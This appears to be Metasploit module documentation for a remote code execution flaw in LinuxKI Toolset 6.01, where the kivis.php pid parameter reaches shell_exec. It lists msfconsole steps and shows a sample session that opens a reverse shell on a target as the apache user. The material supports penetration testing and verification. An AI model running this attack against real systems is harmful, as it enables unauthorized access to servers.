## Description

This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.


## Vulnerable Application
LinuxKI Toolset <= 6.01 

To test this application, you need to download the version 6.01 [here](https://github.com/HewlettPackard/LinuxKI/blob/v6.0-1/Dockerfile).
Do not forget to change [this URL](https://raw.githubusercontent.com/HewlettPackard/LinuxKI/master/rpms/linuxki-6.0-1.noarch.rpm) inside the Dockerfile with [this one](https://github.com/HewlettPackard/LinuxKI/raw/v6.0-1/rpms/linuxki-6.0-1.noarch.rpm).


## Verification Steps

1. Start `msfconsole`
2. `use exploit/linux/http/linuxki_rce`
3. `set RHOST <target_ip>`
4. `set RPORT <target_port>`
5. `set LHOST <your_ip>`
6. `set LPORT <your_port>`
7. Ideally run `check`
8. `set LHOST <your_ip>`
9. `set LPORT <your_port>`
10. Optional: `set TARGETURI <path_to_linuxki>` if target system uses a different path to LinuxKI
11. `exploit`

## Scenarios
### LinuxKI Toolset v6.01

```
msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
rhosts => 10.0.0.1
msf5 exploit(linux/http/linuxki_rce) > set rport 8080
rport => 8080
msf5 exploit(linux/http/linuxki_rce) > check
[+] 10.0.0.1:8080 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
lhost => 10.0.0.5
msf5 exploit(linux/http/linuxki_rce) > run

[*] Started reverse TCP handler on 10.0.0.5:4444
[*] Sending exploit...
[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300

id
uid=48(apache) gid=48(apache) groups=48(apache)
```